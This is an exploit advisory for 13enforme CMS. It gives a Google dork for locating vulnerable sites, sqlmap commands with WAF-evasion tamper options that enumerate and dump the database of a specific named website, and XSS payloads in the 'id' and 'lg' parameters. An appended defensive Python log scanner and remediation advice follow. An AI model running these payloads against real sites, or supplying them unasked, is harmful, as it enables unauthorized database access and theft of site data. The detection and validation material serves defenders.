13enforme CMS version 1 suffers from cross-site scripting and remote SQL injection vulnerabilities.
a6a490b2f371a27e2f0821767995ce8bad44a708e68d124ff2e7e77ebfc083e7
# Exploit Title: 13enforme CMS SQL Injection & XSS Vulnerability
# Google Dork: intext:"13enForme" +inurl:.php?id=
# Date: 2020-04-03
# Exploit Author: @ThelastVvV
# Vendor Homepage: http://www.13enforme.com
# Version: 1
# Tested on: Ubuntu
---------------------------------------------------------
PoC 1:
Once the attacker locates the SQL injection vulnerability, they can use an automated process to exploit the security flaw in the web app.
Payload(s)
http://www.site.com/content.php?id=[]'[SQL INJECTION VULNERABILITY!]
SQLMAP Payload(s):
sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D db538822134 --tables
sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D db538822134 -T plv
PoC 2 :
XSS Vulnerability
Payload(s) :
"><img src=x onerror=prompt(document.domain);>
use payload:
https://www.example/content.php?id=5&lg=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E
www.anysite.com/file.php?id="><img src=x onerror=prompt(document.domain);>
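For defenders, a log check for both PoCs, as an added example that is not part of the original advisory: it flags requests to content.php whose `id` or `lg` value fails a strict allowlist, so keyword-obfuscating tamper scripts such as those in the sqlmap commands above do not affect the result. Assumptions: a combined-format access log, a numeric `id` (as in the URLs above) and a short alphabetic `lg` language code; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed parameter formats: the advisory only shows numeric ids (id=99, id=5);
# the two-to-five letter language code for `lg` is an assumption.
ALLOWED = {"id": re.compile(r"\d{1,10}"), "lg": re.compile(r"[A-Za-z]{2,5}")}
# Assumed combined/common log format request field: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return sorted names of content.php parameters that fail the allowlist."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/content.php"):
        return []
    # parse_qs percent-decodes values, so encoded payloads are checked decoded.
    params = parse_qs(url.query, keep_blank_values=True)
    bad = set()
    for name, values in params.items():
        rule = ALLOWED.get(name)
        if rule and not all(rule.fullmatch(v) for v in values):
            bad.add(name)
    return sorted(bad)

# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Apr/2020:10:00:01 +0000] "GET /content.php?id=99&lg=en HTTP/1.1" 200 5120',
    '192.0.2.44 - - [03/Apr/2020:10:00:07 +0000] "GET /content.php?id=99%27 HTTP/1.1" 500 312',
    '192.0.2.44 - - [03/Apr/2020:10:00:09 +0000] "GET /content.php?id=99/**/aNd/**/7%20BeTwEeN%200%20AnD%209 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [03/Apr/2020:10:02:30 +0000] "GET /content.php?id=5&lg=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E HTTP/1.1" 200 5300',
]

def scan(lines):
    """Map line index -> failing parameter names, for lines with any failure."""
    return {i: bad for i, line in enumerate(lines) if (bad := suspicious_params(line))}

if __name__ == "__main__":
    for idx, bad in scan(SAMPLE_LOG).items():
        print(idx, bad)
```

The same allowlist, applied server-side before the value reaches the query or the page, is the input-validation half of the fix; parameterized queries and output encoding remain necessary.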